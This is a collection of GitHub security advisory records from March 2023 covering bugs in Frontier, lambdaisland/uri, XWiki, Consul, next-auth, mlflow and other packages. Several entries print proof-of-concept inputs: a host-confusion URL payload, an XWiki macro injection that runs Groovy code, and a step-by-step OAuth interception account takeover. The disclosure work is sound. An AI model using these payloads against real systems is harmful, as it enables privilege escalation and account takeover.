Frontier's modexp precompile is slow for even modulus
|
### Impact
Frontier's `modexp` precompile uses `num-bigint` crate under the hood. [In the implementation](https://github.com/rust-num/num-bigint/blob/6f2b8e0fc218dbd0f49bebb8db2d1a771fe6bafa/src/biguint/power.rs#L134), the cases for modulus being even and modulus being odd are treated separately. Odd modulus uses the fast Montgomery multiplication, and even modulus uses the slow plain power algorithm. This gas cost discrepancy was not accounted for in the `modexp` precompile, leading to possible denial of service attacks.
### Patches
No fixes for `num-bigint` is currently available, and thus this advisory will be first fixed in the short term by raising the gas costs for even modulus, and in the long term fixing it in `num-bigint` or switching to another modexp implementation.
The short-term fix for Frontier is deployed at [PR 1017](https://github.com/paritytech/frontier/pull/1017).
The recommendations are as follows:
- If you anticipate malicious validators, it's recommended to issue an emergency runtime upgrade as soon as possible.
- If you do not anticipate malicious validators, it's recommended to issue a normal runtime upgrade, as Substrate has builtin timeout protection when validators are building blocks.
### Workarounds
None.
### References
A similar issue was presented in Geth's implementation and the fix can be found [here](https://go-review.googlesource.com/c/go/+/420897).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'frontier'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/security/advisories/GHSA-fcmm-54jp-7vf6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28431'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/pull/1017'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/commit/5af12e94d7dfc8a0208a290643a800f55de7b219'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/frontier'}, {'type': 'WEB', 'url': 'https://github.com/rust-num/num-bigint/blob/6f2b8e0fc218dbd0f49bebb8db2d1a771fe6bafa/src/biguint/power.rs#L134'}]
|
{'cwe_ids': ['CWE-682'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:31:30Z', 'nvd_published_at': '2023-03-22T21:15:00Z'}
|
1.4.0
|
GHSA-cp4w-6x4w-v2h5
|
2023-03-27T22:31:13Z
|
2023-03-27T22:31:13Z
| null |
['CVE-2023-28628']
|
lambdaisland/uri `authority-regex` returns the wrong authority
|
### Summary
`authority-regex` allows an attacker to send malicious URLs to be parsed by the `lambdaisland/uri` and return the wrong authority. This issue is similar to CVE-2020-8910.
### Details
https://github.com/lambdaisland/uri/blob/d3355fcd3e235238f4dcd37be97787a84e580072/src/lambdaisland/uri.cljc#L9
This regex doesn't handle the backslash (`\`) character in the username correctly, leading to a wrong output.
**Payload:** `https://example.com\\@google.com`
The returned host is `google.com`, but the correct host should be `example.com`.
`urllib3` (Python) and `google-closure-library` (Javascript) return `example.com` as the host. Here the correct (or current) regex used by `google-closure-library`:
https://github.com/google/closure-library/blob/0e567abedb058e9b194a40cfa3ad4c507653bccf/closure/goog/uri/utils.js#L189
### PoC
```
(ns poc.core)
(require '[lambdaisland.uri :refer (uri)])
(def myurl "https://example.com\\@google.com")
(defn -main
[]
(println myurl)
(println (:host (uri myurl)))
)
```
### Impact
The library returns the wrong authority, and it can be abused to bypass host restrictions.
### Reference
WHATWG Living URL spec, section 4.4 URL Parsing, host state: https://url.spec.whatwg.org/#url-parsing
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'lambdaisland:uri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.120'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/security/advisories/GHSA-cp4w-6x4w-v2h5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28628'}, {'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/commit/f46db3e84846f79e14bfee0101d9c7a872321820'}, {'type': 'WEB', 'url': 'https://github.com/google/closure-library/blob/0e567abedb058e9b194a40cfa3ad4c507653bccf/closure/goog/uri/utils.js#L189'}, {'type': 'PACKAGE', 'url': 'https://github.com/lambdaisland/uri'}, {'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/blob/d3355fcd3e235238f4dcd37be97787a84e580072/src/lambdaisland/uri.cljc#L9'}, {'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/releases/tag/v1.14.120'}]
|
{'cwe_ids': ['CWE-601', 'CWE-706'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T22:31:13Z', 'nvd_published_at': '2023-03-27T21:15:00Z'}
|
1.4.0
|
GHSA-vwr6-qp4q-2wj7
|
2023-03-03T22:48:57Z
|
2023-03-03T22:48:57Z
| null |
['CVE-2023-26472']
|
XWiki Platform vulnerable to privilege escalation via async macro and IconThemeSheet from the user profile
|
### Impact
One can execute any wiki content with the right of IconThemeSheet author by creating an icon theme with the following content:
```
}}}
{{async async="true"}}
{{groovy}}
println("Hello from Groovy!")
{{/groovy}}
{{/async}}
{{{
```
Can be done by creating a new page or even through the user profile for users not having edit right.
### Patches
This has been patched in XWiki 14.9, 14.4.6, and 13.10.10.
### Workarounds
An easy workaround is to actually fix the bug in the page `IconThemesCode.IconThemeSheet` by applying the following modification: https://github.com/xwiki/xwiki-platform/commit/48caf7491595238af2b531026a614221d5d61f38#diff-2ec9d716673ee049937219cdb0a92e520f81da14ea84d144504b97ab2bdae243R45
### References
https://jira.xwiki.org/browse/XWIKI-19731
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira](http://jira.xwiki.org)
* Email us at [Security ML](mailto:security@xwiki.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2-milestone-1'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vwr6-qp4q-2wj7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26472'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/48caf7491595238af2b531026a614221d5d61f38#diff-2ec9d716673ee049937219cdb0a92e520f81da14ea84d144504b97ab2bdae243R45'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19731'}]
|
{'cwe_ids': ['CWE-116'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:48:57Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
|
1.4.0
|
GHSA-wj6x-hcc2-f32j
|
2023-09-20T17:41:13Z
|
2023-03-09T18:30:30Z
| null |
['CVE-2023-0845']
|
Consul Server Panic when Ingress and API Gateways Configured with Peering Connections
|
A vulnerability was identified in Consul and Consul Enterprise (“Consul”) an authenticated user with service:write permissions could trigger a workflow that causes Consul server and client agents to crash under certain circumstances. To exploit this vulnerability, an attacker requires access to an ACL token with service:write permissions, and there needs to be at least one running ingress or API gateway that is configured to route traffic to an upstream service.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0845'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-06-consul-server-panic-when-ingress-and-api-gateways-configured-with-peering-connections/51197'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYZOKMMVX4SIEHPJW3SJUQGMO5YZCPHC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XNF4OLYZRQE75EB5TW5N42FSXHBXGWFE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTE4ITXXPIWZEQ4HYQCB6N6GZIMWXDAI/'}]
|
{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T16:04:18Z', 'nvd_published_at': '2023-03-09T16:15:00Z'}
|
1.4.0
|
GHSA-ch7v-37xg-75ph
|
2023-03-14T19:39:51Z
|
2023-03-03T18:30:27Z
| null |
['CVE-2022-2835']
|
coreDNS vulnerable to Improper Restriction of Communication Channel to Intended Endpoints
|
A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of <service>.<namespace>.svc.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/coredns/coredns'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.9.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2835'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2118542'}, {'type': 'PACKAGE', 'url': 'https://github.com/coredns/coredns'}]
|
{'cwe_ids': ['CWE-923'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:11:00Z', 'nvd_published_at': '2023-03-03T16:15:00Z'}
|
1.4.0
|
GHSA-67g8-c724-8mp3
|
2023-03-16T21:38:40Z
|
2023-03-16T17:22:17Z
| null |
['CVE-2023-28104']
|
DDOS attack on graphql endpoints
|
An attacker could use a specially crafted graphql query to execute a Distributed Denial of Service attack (DDOS attack) against a website. This mostly affects websites with publicly exposed and particularly large/complex graphql schemas.
If your Silverstripe CMS project does not expose a public facing graphql schema, a user account is required to trigger the DDOS attack. If your site is hosted behind a content delivery network (CDN), such as Imperva or CloudFlare, this will likely further mitigate the risk.
Upgrade to `silverstripe/graphql` 4.2.3 or 4.1.2 or above to remedy the vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.1'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.2'}, {'fixed': '4.2.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/security/advisories/GHSA-67g8-c724-8mp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28104'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/pull/526'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2023-28104.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-graphql'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases/tag/4.1.2'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases/tag/4.2.3'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2023-28104'}]
|
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T17:22:17Z', 'nvd_published_at': '2023-03-16T16:15:00Z'}
|
1.4.0
|
GHSA-66m4-gc8h-hpjx
|
2023-03-16T21:41:04Z
|
2023-03-12T06:30:21Z
| null |
['CVE-2022-48366']
|
Timing attack in eZ Platform Ibexa
|
Ibexa DXP is using random execution time to hinder timing attacks against user accounts, a method of discovering whether a given account exists in a system without knowing its password, thus affecting privacy. This implementation was found to not be good enough in some situations. The fix replaces this with constant time functionality, configured in the new security.yml parameter 'ibexa.security.authentication.constant_auth_time'. It will log a warning if the constant time is exceeded. If this happens the setting should be increased.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.29'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-kernel/security/advisories/GHSA-342c-vcff-2ff2'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-xfqg-p48g-hh94'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48366'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2022-006-vulnerabilities-in-page-builder-login-and-commerce'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezplatform-kernel'}]
|
{'cwe_ids': ['CWE-362'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:55:56Z', 'nvd_published_at': '2023-03-12T05:15:00Z'}
|
1.4.0
|
GHSA-24wv-mv5m-xv4h
|
2023-05-17T18:44:08Z
|
2023-03-26T21:30:23Z
| null |
['CVE-2023-28858']
|
redis-py Race Condition vulnerability
|
redis-py before 4.5.3, as used in ChatGPT and other products, leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a pipeline operation), and can send response data to the client of an unrelated request in an off-by-one manner. The fixed versions for this CVE Record are 4.3.6, 4.4.3, and 4.5.3, but [are believed to be incomplete](https://github.com/redis/redis-py/issues/2665). CVE-2023-28859 has been assigned the issues caused by the incomplete fixes.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.3.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28858'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/issues/2624'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2641'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/commit/d56baeb683fc1935cfa343fa2eeb0fa9bd955283'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-45.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/redis/redis-py'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/compare/v4.3.5...v4.3.6'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/compare/v4.4.2...v4.4.3'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/compare/v4.5.2...v4.5.3'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.4.4'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.5.4'}, {'type': 'WEB', 'url': 'https://openai.com/blog/march-20-chatgpt-outage'}]
|
{'cwe_ids': ['CWE-193'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T21:31:45Z', 'nvd_published_at': '2023-03-26T19:15:00Z'}
|
1.4.0
|
GHSA-qhq8-2f3m-gxvp
|
2023-03-14T23:03:22Z
|
2023-03-08T21:30:23Z
| null |
['CVE-2023-24782']
|
SQL Injection in Funadmin
|
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'funadmin/funadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24782'}, {'type': 'WEB', 'url': 'https://github.com/funadmin/funadmin/issues/3'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T23:03:22Z', 'nvd_published_at': '2023-03-08T21:15:00Z'}
|
1.4.0
|
GHSA-wp72-7hj9-5265
|
2023-03-28T18:04:29Z
|
2023-03-24T22:01:15Z
| null |
['CVE-2023-1176']
|
Remote file existence check vulnerability in `mlflow server` and `mlflow ui` CLIs
|
### Impact
Users of the MLflow Open Source Project who are hosting the MLflow Model Registry using the `mlflow server` or `mlflow ui` commands using an MLflow version older than MLflow 2.2.1 may be vulnerable to a remote file existence check exploit if they are not limiting who can query their server (for example, by using a cloud VPC, an IP allowlist for inbound requests, or authentication / authorization middleware).
This issue only affects users and integrations that run the `mlflow server` and `mlflow ui` commands. Integrations that do not make use of `mlflow server` or `mlflow ui` are unaffected; for example, the Databricks Managed MLflow product and MLflow on Azure Machine Learning do not make use of these commands and are not impacted by these vulnerabilities in any way.
The vulnerability detailed in https://nvd.nist.gov/vuln/detail/CVE-2023-1176 enables an actor to check the existence of arbitrary files unrelated to MLflow from the host server, including any files stored in remote locations to which the host server has access.
### Patches
This vulnerability has been patched in MLflow 2.2.1, which was released to PyPI on March 2nd, 2023. If you are using `mlflow server` or `mlflow ui` with the MLflow Model Registry, we recommend upgrading to MLflow 2.2.1 as soon as possible.
### Workarounds
If you are using the MLflow open source `mlflow server` or `mlflow ui` commands, we strongly recommend limiting who can access your MLflow Model Registry and MLflow Tracking servers using a cloud VPC, an IP allowlist for inbound requests, authentication / authorization middleware, or another access restriction mechanism of your choosing.
If you are using the MLflow open source `mlflow server` or `mlflow ui` commands, we also strongly recommend limiting the remote files to which your MLflow Model Registry and MLflow Tracking servers have access. For example, if your MLflow Model Registry or MLflow Tracking server uses cloud-hosted blob storage for MLflow artifacts, make sure to restrict the scope of your server's cloud credentials such that it can only access files and directories related to MLflow.
### References
More information about the vulnerability is available at https://nvd.nist.gov/vuln/detail/CVE-2023-1176.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'mlflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.0'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/security/advisories/GHSA-wp72-7hj9-5265'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1176'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/commit/63ef72aa4334a6473ce7f889573c92fcae0b3c0d'}, {'type': 'PACKAGE', 'url': 'https://github.com/mlflow/mlflow'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ae92f814-6a08-435c-8445-eec0ef4f1085'}]
|
{'cwe_ids': ['CWE-36'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:01:15Z', 'nvd_published_at': '2023-03-24T15:15:00Z'}
|
1.4.0
|
GHSA-7r7x-4c4q-c4qf
|
2023-03-13T20:52:50Z
|
2023-03-13T20:52:50Z
| null |
['CVE-2023-27490']
|
Missing proper state, nonce and PKCE checks for OAuth authentication
|
### Impact
`next-auth` applications using OAuth provider versions before `v4.20.1` are affected.
A bad actor who can spy on the victim's network or able to social engineer the victim to click a manipulated login link could intercept and tamper with the authorization URL to **log in as the victim**, bypassing the CSRF protection.
As an example, an attack can happen in the following scenario.
> TL;DR: The attacker steals the victim's authenticated callback by intercepting and tampering with the authorization URL created by `next-auth`.
1. The victim attempts to log in to the `next-auth` site. For example https://next-auth-example.vercel.app/
2. `next-auth` sets the `checks` cookies according to how the OAuth provider is configured. In this case, `state` and `pkce` are set by default for the Google Provider.
<img width="1971" alt="Screen Shot 2023-03-03 at 09 54 26" src="https://user-images.githubusercontent.com/31528554/222619750-a2062bb8-99eb-4985-a75c-d75acd3da67e.png">
3. The attacker intercepts the returned authorization URL, strips away the OAuth check (nonce, state, pkce), and returns the URL _without_ the check to the victim's browser. For example:
From
```https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=client_id&scope=openid%20email%20profile&response_type=code&redirect_uri=https%3A%2F%2Fnext-auth-example.vercel.app%2Fapi%2Fauth%2Fcallback%2Fgoogle&state=state&code_challenge=code_challenge&code_challenge_method=S256&service=lso&o2v=2&flowName=GeneralOAuthFlow```
to
```https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=client_id&scope=openid%20email%20profile&response_type=code&redirect_uri=https%3A%2F%2Fnext-auth-example.vercel.app%2Fapi%2Fauth%2Fcallback%2Fgoogle&service=lso&o2v=2&flowName=GeneralOAuthFlow```.
Notice the parameters `state`, `code_challenge` and `code_verifier` are removed from the victim's address bar.
4. The victim attempts to log in using their OAuth account.
5. The Authorization Server logs the victim in and calls back to the `next-auth` `api/auth/callback/:providerId`endpoint.
5.1. The attacker intercepts and logs this callback URL for later use.
5.2. `next-auth` checks the callback call from OAuth Authorization Server (doesn't have checks) and compares the checks with the cookies set (has checks) at step 2. This check will fail, resulting in the victim isn't logged in. However, at this step, the Authorization Server has already accepted the victim's request to log in and generated/sent a `code` in the URL.
6. The attacker now has an authorization URL with the `code` that the AS will exchange for valid `access_token`/`id_token` and can log in as the victim automatically. They can open a new browser window and paste in the URL logged at step 5.1 and log in as the victim.
### Patches
We patched the vulnerability in `next-auth` `v4.20.1`
To upgrade, run one of the following:
```
npm i next-auth@latest
```
```
yarn add next-auth@latest
```
```
pnpm add next-auth@latest
```
### Workarounds
Upgrading to `latest` is the recommended way to fix this issue. However, using [Advanced Initialization](https://next-auth.js.org/configuration/initialization#advanced-initialization), developers can manually check the [callback request](https://next-auth.js.org/getting-started/rest-api#getpost-apiauthcallbackprovider) for `state`, `pkce`, and `nonce` against the provider configuration, and abort the sign-in process if there is a mismatch. Check out the [source code](https://github.com/nextauthjs/next-auth/blob/v4/packages/next-auth/src/core/lib/oauth/checks.ts) for help.
### References
- [CSRF](https://www.rfc-editor.org/rfc/rfc6749#section-10.12)
- [PKCE vs nonce](https://danielfett.de/2020/05/16/pkce-vs-nonce-equivalent-or-not/)
- [OAuth provider options](https://next-auth.js.org/configuration/providers/oauth)
- [`checks` provider config](https://authjs.dev/reference/core/providers#checks)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'next-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.20.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/nextauthjs/next-auth/security/advisories/GHSA-7r7x-4c4q-c4qf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27490'}, {'type': 'WEB', 'url': 'https://authjs.dev/reference/core/providers#checks'}, {'type': 'WEB', 'url': 'https://danielfett.de/2020/05/16/pkce-vs-nonce-equivalent-or-not/'}, {'type': 'PACKAGE', 'url': 'https://github.com/nextauthjs/next-auth'}, {'type': 'WEB', 'url': 'https://github.com/nextauthjs/next-auth/compare/next-auth@4.20.0...next-auth@4.20.1#diff-cf9257195d0cb6a835ae4ff1fc73fe2cac0bab847efb0832c1f551209a972b47R55'}, {'type': 'WEB', 'url': 'https://next-auth.js.org/configuration/initialization#advanced-initialization'}, {'type': 'WEB', 'url': 'https://next-auth.js.org/configuration/providers/oauth'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230420-0006/'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc6749#section-10.12'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:52:50Z', 'nvd_published_at': '2023-03-09T21:15:00Z'}
|
1.4.0
|
GHSA-6722-xvq8-3254
|
2023-03-13T15:29:04Z
|
2023-03-06T06:30:18Z
| null |
['CVE-2023-26107']
|
SketchSVG Arbitrary Code Injection vulnerability
|
All versions of the package sketchsvg are vulnerable to Arbitrary Code Injection when invoking `shell.exec` without sanitization nor parametrization while concatenating the current directory as part of the command string.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'sketchsvg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26107'}, {'type': 'PACKAGE', 'url': 'https://github.com/eBay/SketchSVG'}, {'type': 'WEB', 'url': 'https://github.com/eBay/SketchSVG/blob/dd1036648f0f320a3187ef79d506b676b9eb87a6/lib/index.js#23L115'}, {'type': 'WEB', 'url': 'https://github.com/eBay/SketchSVG/blob/dd1036648f0f320a3187ef79d506b676b9eb87a6/lib/index.js#23L64'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SKETCHSVG-3167969'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:30:33Z', 'nvd_published_at': '2023-03-06T05:15:00Z'}
|
1.4.0
|
GHSA-j72f-4hgp-3mwc
|
2023-03-23T19:48:32Z
|
2023-03-17T09:30:19Z
| null |
['CVE-2023-1454']
|
jeecg-boot SQL Injection vulnerability
|
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223299.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1454'}, {'type': 'WEB', 'url': 'https://github.com/J0hnWalker/jeecg-boot-sqli'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.223299'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.223299'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T19:48:32Z', 'nvd_published_at': '2023-03-17T07:15:00Z'}
|
1.4.0
|
GHSA-92wp-r7hm-42g7
|
2023-03-03T22:50:41Z
|
2023-03-03T22:50:41Z
| null |
['CVE-2023-26470']
|
XWiki Platform subject to Uncontrolled Resource Consumption
|
### Impact
It's possible to make the farm unusable by adding an object to a page with a huge number (e.g. 67108863). This will most of the time fill the memory allocated to XWiki and make it unusable every time this document is manipulated.
### Patches
It has been patched in XWiki 14.0
### Workarounds
There is no workaround.
### References
https://jira.xwiki.org/browse/XWIKI-19223
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki](https://jira.xwiki.org)
* Email us at [our security mailing list](mailto:security@xwiki.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H'}]
|
